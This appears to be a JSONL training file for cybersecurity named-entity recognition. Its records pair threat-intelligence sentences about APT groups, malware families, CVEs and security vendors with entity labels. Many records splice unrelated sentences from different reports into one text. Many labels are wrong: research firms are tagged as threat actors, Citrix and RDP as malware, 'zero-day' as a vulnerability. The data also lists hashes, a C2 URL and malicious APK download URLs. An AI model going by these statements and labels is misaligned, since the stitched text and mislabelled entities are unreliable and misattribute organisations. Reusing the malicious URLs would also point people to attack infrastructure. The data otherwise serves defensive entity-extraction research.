{"text": "The MoleRATs group have been known to use this packer in previous attacks .", "spans": {"THREAT_ACTOR: MoleRATs": [[4, 12]]}, "info": {"id": "cyberner_stix_train_002574", "source": "cyberner_stix_train"}}
{"text": "Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . As recently as this past week , researchers observed Chinese hackers escalating cyber-attack efforts to steal military research secrets from US universities .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "TOOL: NetTraveler": [[31, 42]], "VULNERABILITY: CVE-2012-0158": [[64, 77]], "TOOL: NetTraveler Trojan": [[89, 107]], "ORGANIZATION: universities": [[254, 266]]}, "info": {"id": "cyberner_stix_train_002575", "source": "cyberner_stix_train"}}
{"text": "When this HTTP request completes , the event listener will call the ‘ onload1 ’ function .", "spans": {}, "info": {"id": "cyberner_stix_train_002576", "source": "cyberner_stix_train"}}
{"text": "Method onPostExecute parses the response from the above HTTP session and executes the commands provided by the remote attacker . The group behind the OilRig campaign continues to leverage spear-phishing emails with malicious Microsoft Excel documents to compromise victims . Today , Cisco Talos is unveiling the details of a new RAT we have identified we 're calling \" JhoneRAT \" . Lateral Movement to SCADA Hypervisor and OT Attack Execution", "spans": {"THREAT_ACTOR: group": [[133, 138]], "ORGANIZATION: Cisco Talos": [[283, 294]], "TOOL: RAT": [[329, 332]], "MALWARE: JhoneRAT": [[369, 377]], "SYSTEM: SCADA Hypervisor": [[402, 418]]}, "info": {"id": "cyberner_stix_train_002577", "source": "cyberner_stix_train"}}
{"text": "The reverse DNS history of this IP brought “ ads.i * * * e.com ” into our attention . The reason for this is likely the availability of exploits against web browsers , which for a variety of reasons allows an attacker to bypass security features such as Data Execution Prevention ( DEP ) or Address Space Layout Randomization ( ASLR ) . As a final fail-safe , Dexphot uses schtasks.exe to create scheduled tasks . We also utilized this data to build higher - fidelity detections of web server process chains .", "spans": {"FILEPATH: schtasks.exe": [[373, 385]], "THREAT_ACTOR: web server process chains": [[482, 507]]}, "info": {"id": "cyberner_stix_train_002578", "source": "cyberner_stix_train"}}
{"text": "Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 — the same date the first authenticated login to Visma’s network was made using stolen credentials . Tweety Chat 's Android version can record audio , too .", "spans": {"THREAT_ACTOR: Insikt Group": [[0, 12]], "MALWARE: Citrix-hosted": [[111, 124]], "MALWARE: Tweety Chat": [[302, 313]], "SYSTEM: Android": [[317, 324]]}, "info": {"id": "cyberner_stix_train_002579", "source": "cyberner_stix_train"}}
{"text": "Specifically , one organization is geographically located in Europe and the other in North America .", "spans": {}, "info": {"id": "cyberner_stix_train_002580", "source": "cyberner_stix_train"}}
{"text": "Allows an application to collect battery statistics Allows an app to access precise location . By the end of 2016 , the CIA's hacking division , which formally falls under the agency's Center for Cyber Intelligence (CCI) , had over 5000 registered users and had produced more than a thousand hacking systems , trojans , viruses , and other weaponized malware . APT32 is a threat group that has been active since at least 2014 .", "spans": {"THREAT_ACTOR: CIA's hacking division": [[120, 142]], "TOOL: hacking systems": [[292, 307]], "TOOL: trojans": [[310, 317]], "TOOL: viruses": [[320, 327]], "TOOL: weaponized malware": [[340, 358]], "THREAT_ACTOR: APT32": [[361, 366]]}, "info": {"id": "cyberner_stix_train_002581", "source": "cyberner_stix_train"}}
{"text": "COVERAGE Cisco Cloud Web Security ( CWS ) or Web Security Appliance ( WSA ) web scanning prevents access to malicious websites and detects malware used in these attacks . Observed Seedworm victims were located primarily in Pakistan and Turkey , but also in Russia , Saudi Arabia , Afghanistan , Jordan , and elsewhere . This VBScript is obfuscated and contains packed data that is used to infect a target with multiple chained persistent artifacts . This third - stage backdoor is tracked as DOUBLEBACK .", "spans": {"ORGANIZATION: Cisco": [[9, 14]], "SYSTEM: Cloud Web Security": [[15, 33]], "SYSTEM: Web Security Appliance": [[45, 67]], "THREAT_ACTOR: Seedworm": [[180, 188]], "TOOL: VBScript": [[325, 333]], "TOOL: third - stage backdoor": [[455, 477]], "TOOL: DOUBLEBACK": [[492, 502]]}, "info": {"id": "cyberner_stix_train_002582", "source": "cyberner_stix_train"}}
{"text": "I decided to debug the macro and see exactly what it ’s doing before I made any decisions .", "spans": {}, "info": {"id": "cyberner_stix_train_002583", "source": "cyberner_stix_train"}}
{"text": "The WIZARD SPIDER threat group is the Russia-based operator of the TrickBot banking malware . FireEye confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims .", "spans": {"THREAT_ACTOR: WIZARD SPIDER threat group": [[4, 30]], "TOOL: TrickBot banking malware": [[67, 91]], "ORGANIZATION: FireEye": [[94, 101]], "THREAT_ACTOR: APT37": [[148, 153]], "VULNERABILITY: zero-day": [[166, 174]], "TOOL: Adobe Flash": [[175, 186]], "VULNERABILITY: CVE-2018-4878": [[203, 216]], "MALWARE: DOGCALL": [[233, 240]], "MALWARE: malware": [[241, 248]]}, "info": {"id": "cyberner_stix_train_002584", "source": "cyberner_stix_train"}}
{"text": "The malicious macro code first decodes a string which contains a reference to the pastebin url .", "spans": {"TOOL: malicious macro code": [[4, 24]]}, "info": {"id": "cyberner_stix_train_002585", "source": "cyberner_stix_train"}}
{"text": "Using the Dynamic Threat Intelligence Cloud ( DTI ) , FireEye researchers detected a pattern of attacks beginning on April 13th , 2015 .", "spans": {"TOOL: Dynamic Threat Intelligence Cloud": [[10, 43]], "TOOL: DTI": [[46, 49]], "ORGANIZATION: FireEye": [[54, 61]]}, "info": {"id": "cyberner_stix_train_002586", "source": "cyberner_stix_train"}}
{"text": "Now we dig deep in the C2 to explain how it work and how i created the agent based on the function available in the C2 .", "spans": {"TOOL: C2": [[23, 25], [116, 118]]}, "info": {"id": "cyberner_stix_train_002587", "source": "cyberner_stix_train"}}
{"text": "Some of the more interesting commands include : SMS Control Update the address of the C & C server — SMS starting with “ http : // ” Send AES-encrypted SMS message back to sender — SMS starting with “ sms : // ” Update service wake-up interval — “ 2 ” Kill switch — “ 4 ” C & C Control Update the address of the C & C server — “ 1 ” Update service wake-up interval — “ 2 ” Lock the screen — “ 5 ” Display a picture in a WebView from an arbitrary URL — “ 11 ” Send an arbitrary SMS message — “ 8 ” Steal images But according to Gnosticplayers , his foray into a public marketplace like Dream has two goals --besides the first and obvious one being money . Additionally , Starloader was also observed deploying additional tools used by the attackers , such as credential dumpers and keyloggers .", "spans": {"MALWARE: Starloader": [[670, 680]], "MALWARE: credential dumpers": [[758, 776]], "MALWARE: keyloggers": [[781, 791]]}, "info": {"id": "cyberner_stix_train_002588", "source": "cyberner_stix_train"}}
{"text": "As can be observed , the possibilities offered by the bot are pretty common . Our research from 2017 concluded that Guangdong ITSEC (and therefore the MSS) directed the activities of a company named Boyusec , which was identified as a shell company for APT3 . Though we don’t know the targets of these malware samples at the time of writing this article , we suspect the same group is behind these threats for a number of reasons .", "spans": {"THREAT_ACTOR: Guangdong ITSEC": [[116, 131]], "ORGANIZATION: Boyusec": [[199, 206]], "THREAT_ACTOR: APT3": [[253, 257]]}, "info": {"id": "cyberner_stix_train_002589", "source": "cyberner_stix_train"}}
{"text": "PLATINUM configures its backdoor malware to restrict its activities to victims ' working hours , in an attempt to disguise post-infection network activity within normal user traffic . If KeyBoy is a single component of a larger espionage toolkit , the developers may have realized that this older , static-key based , configuration encoding algorithm was inadvertently providing a link between disparate components of their malware suite .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "MALWARE: KeyBoy": [[187, 193]], "MALWARE: configuration encoding algorithm": [[318, 350]]}, "info": {"id": "cyberner_stix_train_002590", "source": "cyberner_stix_train"}}
{"text": "The documents that exploit CVE2017-11882 download another payload — an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script — from the server , which is executed accordingly by the command-line tool mshta.exe . The second Windows vulnerability ( CVE-2017-0143 ) was patched in March 2017 after it was discovered to have been used by two exploit tools—EternalRomance and EternalSynergy—that were also released as part of the Shadow Brokers leak .", "spans": {"VULNERABILITY: CVE2017-11882": [[27, 40]], "TOOL: HTML Application": [[71, 87]], "MALWARE: HTA": [[90, 93]], "MALWARE: mshta.exe": [[223, 232]], "SYSTEM: Windows": [[246, 253]], "VULNERABILITY: exploit": [[361, 368]], "THREAT_ACTOR: Shadow Brokers": [[448, 462]]}, "info": {"id": "cyberner_stix_train_002591", "source": "cyberner_stix_train"}}
{"text": "The code is heavily obfuscated and made unreadable through name mangling and use of meaningless variable names : Decryption with a twist The malware uses an interesting decryption routine : the string values passed to the decryption function do not correspond to the decrypted value , they correspond to junk code to simply hinder analysis . ministries of foreign affairs in Europe have been targeted and compromised by a threat actor we call Ke3chang . Suspicious message body: The attachment was mentioned in the message body twice, making sure to direct the reader’s attention towards the . The arrest makes him the third LockBit affiliate charged in the US since November .", "spans": {"ORGANIZATION: ministries of foreign affairs": [[342, 371]], "THREAT_ACTOR: threat actor": [[422, 434]], "THREAT_ACTOR: Ke3chang": [[443, 451]], "THREAT_ACTOR: LockBit": [[625, 632]]}, "info": {"id": "cyberner_stix_train_002592", "source": "cyberner_stix_train"}}
{"text": "Dell Secureworks analysts recently concluded that domains discussed in the IBM report were linked to the Iranian PuppyRAT .", "spans": {"ORGANIZATION: Dell": [[0, 4]], "ORGANIZATION: IBM": [[75, 78]], "THREAT_ACTOR: PuppyRAT": [[113, 121]]}, "info": {"id": "cyberner_stix_train_002593", "source": "cyberner_stix_train"}}
{"text": "Following screenshot shows this functionality in action : Other functions In addition to the functionalities we ’ ve described , the SpyNote RAT was exhibiting many other behaviors that make it more robust than most off-the-shelf malware . On 24 March 2019 , Silence.ProxyBot (MD5 2fe01a04d6beef14555b2cf9a717615c) was uploaded to VirusTotal from an IP address in Sri Lanka . The leader of the crime gang behind the Carbanak and Cobalt malware attacks targeting over a 100 financial institutions worldwide has been arrested in Alicante , Spain , after a complex investigation conducted by the Spanish National Police .", "spans": {"MALWARE: SpyNote RAT": [[133, 144]], "MALWARE: Silence.ProxyBot": [[259, 275]], "THREAT_ACTOR: crime gang": [[394, 404]], "MALWARE: Carbanak": [[416, 424]], "ORGANIZATION: financial institutions": [[473, 495]]}, "info": {"id": "cyberner_stix_train_002594", "source": "cyberner_stix_train"}}
{"text": "The developers of Charger gave it everything they had to boost its evasion capabilities and so it could stay hidden on Google Play for as long as possible . An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims . We analyzed AveMaria targets during February and March of 2019 . As Google Analytics is allowed in the CSP configuration of many major sites , this demo shows how an attacker can bypass this security protection and steal data .", "spans": {"MALWARE: Charger": [[18, 25]], "SYSTEM: Google Play": [[119, 130]], "ORGANIZATION: banking": [[251, 258]], "ORGANIZATION: bank employees": [[346, 360]], "MALWARE: AveMaria": [[430, 438]], "SYSTEM: Google Analytics": [[486, 502]], "SYSTEM: CSP": [[521, 524]], "THREAT_ACTOR: attacker": [[584, 592]]}, "info": {"id": "cyberner_stix_train_002595", "source": "cyberner_stix_train"}}
{"text": "This particular case is not an exception . In the early part of 2017 , Group123 started the \" Evil New Year \" campaign . For example , The Regin malware platform supports many standard protocols , including SMB.[10 ] Rocke issued wget requests from infected systems to the C2.[11 ] Siloscape connects to an IRC server for C2.[12 ]", "spans": {"THREAT_ACTOR: Group123": [[71, 79]], "TOOL: Regin malware platform": [[139, 161]], "TOOL: SMB.[10": [[207, 214]], "MALWARE: Rocke": [[217, 222]], "TOOL: wget": [[230, 234]], "SYSTEM: C2.[11": [[273, 279]], "MALWARE: Siloscape": [[282, 291]], "SYSTEM: IRC server": [[307, 317]], "SYSTEM: C2.[12": [[322, 328]]}, "info": {"id": "cyberner_stix_train_002596", "source": "cyberner_stix_train"}}
{"text": "The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat . The infection vector is similar , it uses a similar modified mimikatz application , and it uses a third-party remote access tool , changes system settings to allow concurrent RDP sessions , and so on .", "spans": {"TOOL: Windows 10 Creators Update": [[4, 30]], "ORGANIZATION: Windows Defender ATP": [[66, 86]], "ORGANIZATION: SOC personnel": [[105, 118]], "MALWARE: mimikatz": [[241, 249]], "MALWARE: third-party remote access tool": [[278, 308]], "MALWARE: RDP": [[355, 358]]}, "info": {"id": "cyberner_stix_train_002597", "source": "cyberner_stix_train"}}
{"text": "Monitoring Broadcast Events XLoader registers many broadcast receivers in the payload dynamically ( to monitor broadcast events sent between system and applications ) . Two unique malware frameworks , EHDevel and yty , are developed by attackers . The crucial file , at this point of the infection , is the SFX executable named “ uninstall.exe ” .", "spans": {"MALWARE: XLoader": [[28, 35]], "TOOL: EHDevel": [[201, 208]], "TOOL: yty": [[213, 216]], "THREAT_ACTOR: attackers": [[236, 245]], "TOOL: SFX": [[307, 310]], "FILEPATH: uninstall.exe": [[330, 343]]}, "info": {"id": "cyberner_stix_train_002598", "source": "cyberner_stix_train"}}
{"text": "The Magnitude EK landing page consisted of CVE-2016-0189 , which was first reported by FireEye as being used in Neutrino Exploit Kit after it was patched . In May 2017 , APT37 used a bank liquidation letter as a spear phishing lure against a board member of a Middle Eastern financial company .", "spans": {"TOOL: Magnitude EK": [[4, 16]], "VULNERABILITY: CVE-2016-0189": [[43, 56]], "ORGANIZATION: FireEye": [[87, 94]], "TOOL: Neutrino Exploit Kit": [[112, 132]], "THREAT_ACTOR: APT37": [[170, 175]], "ORGANIZATION: board member": [[242, 254]], "ORGANIZATION: financial company": [[275, 292]]}, "info": {"id": "cyberner_stix_train_002599", "source": "cyberner_stix_train"}}
{"text": "] 205 [ . Importantly , PinchDuke trojan samples always contain a notable text string , which we believe is used as a campaign identifier by the Dukes group to distinguish between multiple attack campaigns that are run in parallel . A previous blog post by enigma0x3 , detailed how this CLSID can be leveraged to instantiate the ShellBrowserWindow object and call the ShellExecute method , which is the same approach that was taken by the attackers . An adversary could potentially instruct a control systems device to perform an action that will cause an Impact", "spans": {"TOOL: PinchDuke trojan samples": [[24, 48]], "THREAT_ACTOR: Dukes group": [[145, 156]], "TOOL: ShellBrowserWindow": [[329, 347]], "TOOL: ShellExecute": [[368, 380]], "VULNERABILITY: An adversary could potentially instruct a control systems device to perform an action that will cause an Impact": [[451, 562]]}, "info": {"id": "cyberner_stix_train_002600", "source": "cyberner_stix_train"}}
{"text": "The loader first dynamically rebuilds a simple import address table ( IAT ) , resolving all the API needed from Kernel32 and NtDll libraries . The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method , specifically attempting to load MagicHound.Rollover . Winnti : bb4ab0d8d05a3404f1f53f152ebd79f4ba4d4d81 2018-10-10 09:57:31 http://checkin.travelsanignacio.com . Developed in - house using C++ , the NoEscape ransomware uses a hybrid approach to encryption , combining ChaCha20 and RSA encryption algorithms for file encryption and key protection .", "spans": {"TOOL: MagicHound.Rollover": [[281, 300]], "THREAT_ACTOR: Winnti": [[303, 309]], "FILEPATH: bb4ab0d8d05a3404f1f53f152ebd79f4ba4d4d81": [[312, 352]], "URL: http://checkin.travelsanignacio.com": [[373, 408]], "MALWARE: NoEscape ransomware": [[448, 467]]}, "info": {"id": "cyberner_stix_train_002601", "source": "cyberner_stix_train"}}
{"text": "In this case , we can see that the HTML code of the overlay is stored in the C2 infrastructure . As MuddyWater has consistently been using POWERSTATS as its main tool , they are relatively easy to distinguish from other actors . This DLL requires the loading executable to include a 32-byte key on the command line to be able to decrypt the embedded payload , which unfortunately we do not have . Sandworm later conducted a second disruptive event by deploying a new variant of CADDYWIPER in the victim ’s IT environment .", "spans": {"THREAT_ACTOR: MuddyWater": [[100, 110]], "TOOL: POWERSTATS": [[139, 149]], "THREAT_ACTOR: actors": [[220, 226]], "TOOL: DLL": [[234, 237]], "THREAT_ACTOR: Sandworm": [[397, 405]], "MALWARE: CADDYWIPER": [[478, 488]]}, "info": {"id": "cyberner_stix_train_002602", "source": "cyberner_stix_train"}}
{"text": "Sample 2 , has the package name cn.android.setting masquerading as Android ’ s Settings app , which has a similar package name ( com.android.settings ) . For example , Donot and Bitter disguised as Kashmiri Voice to attack Pakistan , Transparent Tribe attacked India with decoy document regarding terrorist attacks in Kashmir . TG-0416 is a stealthy and extremely successful Advanced Persistent Threat ( APT ) group known to target a broad range of verticals since at least 2009 , including technology , industrial , manufacturing , human rights groups , government , pharmaceutical , and medical technology .", "spans": {"SYSTEM: Settings app": [[79, 91]], "THREAT_ACTOR: Donot": [[168, 173]], "THREAT_ACTOR: Bitter": [[178, 184]], "THREAT_ACTOR: TG-0416": [[328, 335]], "ORGANIZATION: technology": [[491, 501]], "ORGANIZATION: industrial": [[504, 514]], "ORGANIZATION: manufacturing": [[517, 530]], "ORGANIZATION: human rights groups": [[533, 552]], "ORGANIZATION: government": [[555, 565]], "ORGANIZATION: pharmaceutical": [[568, 582]], "ORGANIZATION: medical technology": [[589, 607]]}, "info": {"id": "cyberner_stix_train_002603", "source": "cyberner_stix_train"}}
{"text": "Office 365 ATP blocks unsafe attachments , malicious links , and linked-to files using time-of-click protection . Poison Ivy is a remote access tool that is freely available for download from its official web site at www.poisonivy-rat.com . OceanLotus : {68DDB1F1-E31F-42A9-A35D-984B99ECBAAD} registry path varies SOFTWARE\\Classes\\CLSID\\{57C3E2E2-C18F-4ABF-BAAA-9D17879AB029} . Mandiant is investigating intrusions across multiple verticals , including legal and professional services , technology , and government organizations .", "spans": {"SYSTEM: Office 365 ATP": [[0, 14]], "TOOL: Poison Ivy": [[114, 124]], "THREAT_ACTOR: OceanLotus": [[241, 251]], "ORGANIZATION: legal and professional services , technology , and government organizations": [[453, 528]]}, "info": {"id": "cyberner_stix_train_002604", "source": "cyberner_stix_train"}}
{"text": "2015-01-20 to present time http : //217.194.13.133/190/configurazione/vodafone/smartphone/Vodafone % 20Configuratore.apk http : //217.194.13.133/190/configurazione/vodafone/smartphone/index.html currently active http : //vodafoneinfinity.sytes.net/tim/internet/Configuratore_TIM.apk http : //vodafoneinfinity.sytes.net/tim/internet/ 2015-03-04 http : //vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/VODAFONE Data points span from September 2018 to January 2019 where we observed over 17 million downloads in just five months . APT1 is a Chinese threat group that has been attributed to the 2nd Bureau of the People ’s Liberation Army ( PLA ) General Staff Department ’s ( GSD ) 3rd Department , commonly known by its Military Unit Cover Designator ( MUCD ) as Unit 61398 .", "spans": {"ORGANIZATION: we": [[487, 489]], "THREAT_ACTOR: APT1": [[547, 551]], "ORGANIZATION: 2nd Bureau of the People ’s Liberation Army": [[610, 653]], "ORGANIZATION: PLA": [[656, 659]], "ORGANIZATION: General Staff Department ’s": [[662, 689]], "ORGANIZATION: GSD": [[692, 695]], "ORGANIZATION: 3rd Department": [[698, 712]], "ORGANIZATION: Military Unit Cover Designator": [[737, 767]], "ORGANIZATION: MUCD": [[770, 774]], "ORGANIZATION: Unit 61398": [[780, 790]]}, "info": {"id": "cyberner_stix_train_002605", "source": "cyberner_stix_train"}}
{"text": "The Cobalt Strike tool has malleable C2 profiles .", "spans": {"TOOL: Cobalt Strike": [[4, 17]], "TOOL: C2": [[37, 39]]}, "info": {"id": "cyberner_stix_train_002606", "source": "cyberner_stix_train"}}
{"text": "The incomplete iOS codes used in this campaign may have been bought while other capabilities appear to have been added . of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States . The modified code checks the tail instruction and if the true case destination is a control flow dispatcher , JumpCloud reported this unauthorized access impacted fewer than five customers and less than 10 devices .", "spans": {"SYSTEM: iOS": [[15, 18]], "THREAT_ACTOR: Gorgon Group": [[156, 168]], "ORGANIZATION: governmental organizations": [[179, 205]], "ORGANIZATION: JumpCloud": [[381, 390]]}, "info": {"id": "cyberner_stix_train_002607", "source": "cyberner_stix_train"}}
{"text": "The newer version of FakeSpy uses new URL addresses for malicious communication with FakeSpy . They also use AutoIT droppers , password-protected EXE files and even ISO images . Furthermore , FireEye has presented evidence indicating that the Ke3chang attackers have been active since at least 2010 and have attacked targets related to G20 meetings in the past .", "spans": {"MALWARE: FakeSpy": [[21, 28], [85, 92]], "THREAT_ACTOR: They": [[95, 99]], "TOOL: AutoIT droppers": [[109, 124]], "ORGANIZATION: FireEye": [[192, 199]], "THREAT_ACTOR: Ke3chang": [[243, 251]], "THREAT_ACTOR: attackers": [[252, 261]], "ORGANIZATION: G20 meetings": [[336, 348]]}, "info": {"id": "cyberner_stix_train_002608", "source": "cyberner_stix_train"}}
{"text": "The first signed hacktool we identified in late 2015 was a digitally signed brute-force server message block ( SMB ) scanner .", "spans": {"TOOL: server message block": [[88, 108]], "TOOL: SMB": [[111, 114]]}, "info": {"id": "cyberner_stix_train_002609", "source": "cyberner_stix_train"}}
{"text": "Thanks to this data leak , we were able to confirm that the malware really worked as designed : the attacker had access to the victims ’ entered credentials , displayed or written emails and messages , etc . In 2018 , Kaspersky Labs published a report that analyzed a Turla PowerShell loader that was based on the open-source project Posh-SecMod . FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors .", "spans": {"ORGANIZATION: Kaspersky": [[218, 227]], "THREAT_ACTOR: Turla": [[268, 273]], "TOOL: PowerShell loader": [[274, 291]], "MALWARE: FALLCHILL": [[348, 357]], "MALWARE: HIDDEN COBRA malware": [[412, 432]], "THREAT_ACTOR: HIDDEN COBRA actors": [[513, 532]]}, "info": {"id": "cyberner_stix_train_002610", "source": "cyberner_stix_train"}}
{"text": "Additionally , we can see there were at least 3 very large campaigns where Palo Alto Networks saw activity to these sites in July .", "spans": {}, "info": {"id": "cyberner_stix_train_002611", "source": "cyberner_stix_train"}}
{"text": "We have noticed that hundreds of the email addresses are associated with enterprise accounts worldwide . APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition . During the callback , It incorporates the capabilities of the FULLHOUSE tunneler in addition to supporting backdoor commands including shell command execution , file transfer , file management , and process injection .", "spans": {"THREAT_ACTOR: APT38": [[105, 110]], "ORGANIZATION: banks": [[156, 161]], "ORGANIZATION: financial institutions": [[172, 194]]}, "info": {"id": "cyberner_stix_train_002612", "source": "cyberner_stix_train"}}
{"text": "Some of them are iOS versions of the ones removed from Google Play , but none contain adware functionality . The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . SHA256 : 553a475f72819b295927e469c7bf9aef774783f3ae8c34c794f35702023317cc .", "spans": {"SYSTEM: iOS": [[17, 20]], "SYSTEM: Google Play": [[55, 66]], "MALWARE: flare-qdb": [[127, 136]], "FILEPATH: 553a475f72819b295927e469c7bf9aef774783f3ae8c34c794f35702023317cc": [[204, 268]]}, "info": {"id": "cyberner_stix_train_002613", "source": "cyberner_stix_train"}}
{"text": "The Shadow Brokers first emerged in August , when they posted links to a selection of NSA exploits and hacking tools onto Github and other websites . Taiwan has been a regular target of Cyber Espionage threat actors for a number of years .", "spans": {"VULNERABILITY: NSA exploits": [[86, 98]]}, "info": {"id": "cyberner_stix_train_002614", "source": "cyberner_stix_train"}}
{"text": "While our systems are great at automatically detecting and protecting against PHAs , we believe the best security comes from the combination of automated scanning and skilled human review . The first attack in the US that Group-IB attributes to this group was conducted in the spring of 2016 : money was stolen from the bank by gaining access to First Data 's \" STAR \" network operator portal . The successful exploitation of both vulnerabilities led to the delivery of either a downloader that we refer to as IRONHALO , or a backdoor that we refer to as ELMER . This second , partially obfuscated web shell , named iisstart.aspx ( MD5 : 0fd9bffa49c76ee12e51e3b8ae0609ac ) , was more advanced and contained functions to interact with the file system .", "spans": {"ORGANIZATION: Group-IB": [[222, 230]], "ORGANIZATION: bank": [[320, 324]], "MALWARE: IRONHALO": [[510, 518]], "MALWARE: ELMER": [[555, 560]], "SYSTEM: the file system": [[734, 749]]}, "info": {"id": "cyberner_stix_train_002615", "source": "cyberner_stix_train"}}
{"text": "However , binding a shell on all available interfaces will obviously make it accessible to anyone who is sharing at least a local network with an infected device . Suckfly conducted a multistage attack against an e-commerce organization based in India . potentially leaked Hamas document detailing Hamas 32nd anniversary expenses in different regions in the Palestinian Territories 932ecbc5112abd0ed30231896752ca471ecd0c600b85134631c1d5ffcf5469fb . • Other actors merged into this group : 6 UNC1878 is a financially motivated group that monetizes their intrusions by extorting their victims following the deployment of RYUK ransomware .", "spans": {"ORGANIZATION: e-commerce organization": [[213, 236]], "FILEPATH: 932ecbc5112abd0ed30231896752ca471ecd0c600b85134631c1d5ffcf5469fb": [[382, 446]], "THREAT_ACTOR: UNC1878": [[491, 498]], "THREAT_ACTOR: extorting their victims following the deployment": [[567, 615]], "TOOL: RYUK ransomware": [[619, 634]]}, "info": {"id": "cyberner_stix_train_002616", "source": "cyberner_stix_train"}}
{"text": "Overlay attack Ginp uses the Accessibility Service to check which application runs is the foreground . The Visma group operates across the entire Nordic region along with Benelux , Central , and Eastern Europe . It opens a TCP port and receives commands from a remote attacker .", "spans": {"THREAT_ACTOR: Visma": [[107, 112]]}, "info": {"id": "cyberner_stix_train_002617", "source": "cyberner_stix_train"}}
{"text": "] com/gate_cb8a5aea1ab302f0_c online 185.158.248 [ . The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems . menuPass typically makes use of a mix of DDNS and actor-registered domains in their attack campaigns .", "spans": {"MALWARE: Trojan": [[86, 92]], "MALWARE: DDNS and actor-registered domains": [[222, 255]]}, "info": {"id": "cyberner_stix_train_002618", "source": "cyberner_stix_train"}}
{"text": "Successful execution of the macro within the malicious document results in the installation of APT28 ’s signature GAMEFISH malware .", "spans": {"TOOL: macro": [[28, 33]], "THREAT_ACTOR: APT28": [[95, 100]], "MALWARE: GAMEFISH": [[114, 122]]}, "info": {"id": "cyberner_stix_train_002619", "source": "cyberner_stix_train"}}
{"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . it reports to was created on August 10 , 2011 .", "spans": {"ORGANIZATION: security firm": [[17, 30]], "ORGANIZATION: military officials": [[63, 81]], "VULNERABILITY: Adobe Reader vulnerability": [[153, 179]]}, "info": {"id": "cyberner_stix_train_002620", "source": "cyberner_stix_train"}}
{"text": "Domain Name : Spoofed Site ntg-sa.com The domain ntg-sa.com appears to spoof the legit domain ntg.sa.com associated with the Namer Trading Group .", "spans": {"URL: ntg-sa.com": [[27, 37], [49, 59]], "URL: ntg.sa.com": [[94, 104]], "ORGANIZATION: Namer Trading Group": [[125, 144]]}, "info": {"id": "cyberner_stix_train_002621", "source": "cyberner_stix_train"}}
{"text": "Activation cycle As we have explained above , the malware has several defence mechanisms . The Palo Alto Networks Unit 42 research team recently came across a series of malicious files which were almost identical to those targeting the Saudi Arabian government previously discussed by MalwareBytes . The script is downloading a second stage payload via the Microsoft tool msiexec . YARA Rules", "spans": {"ORGANIZATION: Palo Alto Networks Unit 42": [[95, 121]], "MALWARE: malicious files": [[169, 184]], "ORGANIZATION: government": [[250, 260]], "ORGANIZATION: MalwareBytes": [[285, 297]], "ORGANIZATION: Microsoft": [[357, 366]], "TOOL: msiexec": [[372, 379]]}, "info": {"id": "cyberner_stix_train_002622", "source": "cyberner_stix_train"}}
{"text": "Payload : The malware ; software that will enable the attacker to make use of ( control , exfiltrate data from , or download more software to ) the target computer .", "spans": {}, "info": {"id": "cyberner_stix_train_002623", "source": "cyberner_stix_train"}}
{"text": "However , the existence of threats like ViperRAT and Pegasus , the most sophisticated piece of mobile surveillanceware we ’ ve seen to date , are evidence that attackers are targeting mobile devices . this library includes two drivers compiled on August 22 and September 4 , 2014 . ZxShell plugins are parsed and loaded with the AnalyseAndLoadPlugins function . OilRig uses two initial access vectors spearphishing and through ITbrain , which is a remote administration software , used in conjunction with the remote access tool TeamViewer .", "spans": {"MALWARE: ViperRAT": [[40, 48]], "MALWARE: Pegasus": [[53, 60]], "MALWARE: ZxShell": [[282, 289]], "THREAT_ACTOR: OilRig": [[362, 368]], "TOOL: ITbrain": [[427, 434]], "TOOL: TeamViewer": [[529, 539]]}, "info": {"id": "cyberner_stix_train_002624", "source": "cyberner_stix_train"}}
{"text": "Instead of compiling a different server for each client , our server uses the code from within the client to communicate with it .", "spans": {"TOOL: server": [[33, 39]], "TOOL: our server": [[58, 68]]}, "info": {"id": "cyberner_stix_train_002625", "source": "cyberner_stix_train"}}
{"text": "] 26/html2/arc92/au483x.zip hxxp : //94.130.106 [ . Based on these observations , as well as MuddyWater 's history of targeting Turkey-based entities , we assess with moderate confidence that this campaign is associated with the MuddyWater threat actor group . Rancor , a cyber espionage group active since at least 2017 , continues to conduct targeted attacks in Southeast Asia E-LOC and has been found using an undocumented , custom malware family – which we ’ve dubbed Dudell – to download a second stage payload once its malicious macro is executed . Based on these findings , CrowdStrike assesses it is highly likely that the OWA technique employed is in fact tied to CVE-2022 - 41080 .", "spans": {"THREAT_ACTOR: MuddyWater": [[93, 103], [229, 239]], "THREAT_ACTOR: threat actor group": [[240, 258]], "THREAT_ACTOR: Rancor": [[261, 267]], "MALWARE: Dudell": [[472, 478]], "ORGANIZATION: CrowdStrike": [[581, 592]], "VULNERABILITY: CVE-2022 - 41080": [[673, 689]]}, "info": {"id": "cyberner_stix_train_002626", "source": "cyberner_stix_train"}}
{"text": "Targeting individuals linked to presidential campaigns could represent an intelligence ‘ long game ,' as establishing access to potential U.S. administration staff before they are appointed could be easier than targeting them when they are established in the White House .", "spans": {"ORGANIZATION: White House": [[259, 270]]}, "info": {"id": "cyberner_stix_train_002627", "source": "cyberner_stix_train"}}
